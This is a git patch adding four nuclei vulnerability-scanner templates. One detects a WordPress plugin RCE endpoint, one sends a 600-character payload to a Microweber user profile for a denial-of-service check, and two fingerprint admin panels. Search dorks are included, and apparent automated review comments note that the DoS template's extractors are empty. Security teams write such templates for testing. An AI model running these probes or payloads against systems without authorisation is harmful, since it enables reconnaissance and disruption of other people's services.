From 34c47842f35fee45551e5993fc6e2e9f1fccbe74 Mon Sep 17 00:00:00 2001
From: hktalent <18223385+hktalent@users.noreply.github.com>
Date: Sun, 7 Aug 2022 10:08:20 +0800
Subject: [PATCH] up PoCs 2022-08-07
---
.../cves/2021/CVE-2021-24370.yaml | 42 ++++++++++
.../cves/2022/CVE-2022-0968.yaml | 77 +++++++++++++++++++
.../vrealize-loginsight-panel.yaml | 26 +++++++
.../oracle/oracle-webcenter-sites.yaml | 27 +++++++
4 files changed, 172 insertions(+)
create mode 100644 config/nuclei-templates/cves/2021/CVE-2021-24370.yaml
create mode 100644 config/nuclei-templates/cves/2022/CVE-2022-0968.yaml
create mode 100644 config/nuclei-templates/exposed-panels/vrealize-loginsight-panel.yaml
create mode 100644 config/nuclei-templates/technologies/oracle/oracle-webcenter-sites.yaml
diff --git a/config/nuclei-templates/cves/2021/CVE-2021-24370.yaml b/config/nuclei-templates/cves/2021/CVE-2021-24370.yaml
new file mode 100644
index 000000000..0e9fb5eb0
--- /dev/null
+++ b/config/nuclei-templates/cves/2021/CVE-2021-24370.yaml
@@ -0,0 +1,42 @@
+id: CVE-2021-24370
+
+info:
+ name: Fancy Product Designer WordPress plugin - Remote Code Execution (Detection)
+ author: pikpikcu
+ severity: critical
+ description: |
+ Fancy Product Designer WordPress plugin before 4.6.9 allows unauthenticated attackers to upload arbitrary files, resulting in remote code execution.
+ reference:
+ - https://www.wordfence.com/blog/2021/06/critical-0-day-in-fancy-product-designer-under-active-attack/
+ - https://wpscan.com/vulnerability/82c52461-1fdc-41e4-9f51-f9dd84962b38
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-24370
+ - https://lists.openwall.net/full-disclsure/2020/11/17/2
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2021-24370
+ cwe-id: CWE-434,CWE-434
+ metadata:
+ google-dork: inurl:“/wp-content/plugins/fancy-product-designer”
+ tags: cve,cve2021,wordpress,rce,wp-plugin,wp,fancyproduct
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '{"error":"You need to define a directory'
+
+ - type: word
+ part: header
+ words:
+ - "text/html"
+
+ - type: status
+ status:
+ - 200
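Review bot: `cwe-id: CWE-434,CWE-434` under `classification` lists the same CWE twice; it should read `cwe-id: CWE-434`. The reference `https://lists.openwall.net/full-disclsure/2020/11/17/2` misspells the list name ("full-disclsure"), so it is most likely a dead link and should be `full-disclosure`. The `google-dork` value uses typographic quotes (“ ”) around the path instead of ASCII `"`, which a search engine will not treat as a quoted phrase; write it as `google-dork: 'inurl:"/wp-content/plugins/fancy-product-designer"'`. The body matcher expects a JSON error string while the header matcher expects `text/html`, which is presumably what the handler actually emits, but a one-line comment above `matchers:` saying so would spare the next reader from "fixing" it.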
diff --git a/config/nuclei-templates/cves/2022/CVE-2022-0968.yaml b/config/nuclei-templates/cves/2022/CVE-2022-0968.yaml
new file mode 100644
index 000000000..43552faa0
--- /dev/null
+++ b/config/nuclei-templates/cves/2022/CVE-2022-0968.yaml
@@ -0,0 +1,77 @@
+id: CVE-2022-0968
+
+info:
+ name: Microweber < 1.2.12 - Integer Overflow (DOS)
+ author: amit-jd
+ severity: medium
+ description: |
+ The microweber application allows large characters to insert in the input field "first & last name" which can allow attackers to cause a Denial of Service (DoS) via a crafted HTTP request. The first name & last name input should be limited to 50 characters or max 100 characters.
+ reference:
+ - https://huntr.dev/bounties/97e36678-11cf-42c6-889c-892d415d9f9e/
+ - /~https://github.com/advisories/GHSA-5fxv-xx5p-g2fv
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-0968
+ - https://huntr.dev/bounties/97e36678-11cf-42c6-889c-892d415d9f9e
+ classification:
+ cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
+ cvss-score: 5.5
+ cve-id: CVE-2022-0968
+ cwe-id: CWE-190
+ tags: cve,cve2022,overflow,microweber,cms
+
+variables:
+ payload: '{{repeat("A", 600)}}'
+
+requests:
+ - raw:
+ - |
+ POST /api/user_login HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ username={{username}}&password={{password}}
+
+ - |
+ GET /admin/view:modules/load_module:users/edit-user:2 HTTP/1.1
+ Host: {{Hostname}}
+
+ - |
+ POST /api/user/2 HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+ thumbnail=&id=2&token={{form_token}}&_method=PATCH&username={{user}}&verify_password=&first_name={{payload}}&last_name=test&email={{email}}&phone=&is_admin=0&is_active=1&basic_mode=0&api_key=
+
+ req-condition: true
+ cookie-reuse: true
+ matchers:
+ - type: dsl
+ dsl:
+ - contains(body_3,'\"first_name\":\"{{payload}}\"')
+ - 'status_code_3==200'
+ - 'contains(all_headers_3,"application/json")'
+ condition: and
+
+ extractors:
+ - type: regex
+ part: body
+ name: form_token
+ internal: true
+ group: 1
+ regex:
+ - ''
+
+ - type: regex
+ part: body
+ name: user
+ internal: true
+ group: 1
+ regex:
+ - ''
+
+ - type: regex
+ part: body
+ name: email
+ internal: true
+ group: 1
+ regex:
+ - ''
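Review bot: All three `extractors` (form_token, user, email) have `regex: - ''` with `group: 1`; an empty pattern has no capture group, so none of the variables is ever set and the third request's `token={{form_token}}`, `username={{user}}`, `email={{email}}` go out unexpanded, meaning the template cannot match as written. The patterns need to be filled in from the edit-user page's markup, e.g. `- '<placeholder: form_token capture pattern>'`, one per extractor. The first request also depends on `{{username}}` and `{{password}}`, which nothing in the template defines, so they must be supplied at run time; that requirement belongs in the description. The third request PATCHes user id 2's profile with the 600-byte `first_name`, i.e. the check mutates a real account rather than only reading, which the description should state so operators can decide whether to run it against a target. The same huntr URL appears twice in `reference`; drop the second copy.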
diff --git a/config/nuclei-templates/exposed-panels/vrealize-loginsight-panel.yaml b/config/nuclei-templates/exposed-panels/vrealize-loginsight-panel.yaml
new file mode 100644
index 000000000..01ac1b145
--- /dev/null
+++ b/config/nuclei-templates/exposed-panels/vrealize-loginsight-panel.yaml
@@ -0,0 +1,26 @@
+id: vrealize-loginsight-panel
+
+info:
+ name: vRealize Log Insight Panel
+ author: pussycat0x
+ severity: info
+ description: Detect vRealize Log Insight login panel
+ metadata:
+ verified: true
+ shodan-dork: title:"vRealize Log insight"
+ tags: panel,vmware,vrealize
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/login?loginUrl=%2Findex"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'vRealize Log Insight'
+
+ - type: status
+ status:
+ - 200
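Review bot: The only content check is the single phrase `vRealize Log Insight` anywhere in the response (the `type: word` matcher has no `part:`, so it applies to the body), so any page that merely mentions the product alongside a 200 satisfies the template. Consider anchoring on a second phrase that appears only on the login page itself, combined with `condition: and` as the Oracle template in this patch does; the exact token would need confirming against a live panel, e.g. `- '<placeholder: login-page-specific string>'`. The `description` should also mention that the probe is the `/login?loginUrl=%2Findex` page, since that is what the match is tied to.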
diff --git a/config/nuclei-templates/technologies/oracle/oracle-webcenter-sites.yaml b/config/nuclei-templates/technologies/oracle/oracle-webcenter-sites.yaml
new file mode 100644
index 000000000..9e814a20a
--- /dev/null
+++ b/config/nuclei-templates/technologies/oracle/oracle-webcenter-sites.yaml
@@ -0,0 +1,27 @@
+id: oracle-webcenter-sites
+
+info:
+ name: Oracle WebCenter Sites
+ author: leovalcante
+ severity: info
+ metadata:
+ verified: true
+ shodan-query: http.html:"WebCenter"
+ tags: tech,oracle,webcenter
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/welcome_webcenter.html'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'FOR ORACLE'
+ - 'WebCenter Framework'
+ condition: and
+
+ - type: status
+ status:
+ - 200
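Review bot: The `info` block has no `description`, unlike the other three templates in this patch; add one line beneath `severity`, such as `description: Detects an Oracle WebCenter Sites installation by its default welcome page.`. The path uses single quotes (`'{{BaseURL}}/welcome_webcenter.html'`) while CVE-2021-24370.yaml and the vRealize template use double quotes for the same `{{BaseURL}}` construct; both parse identically, but one style across the patch reads better.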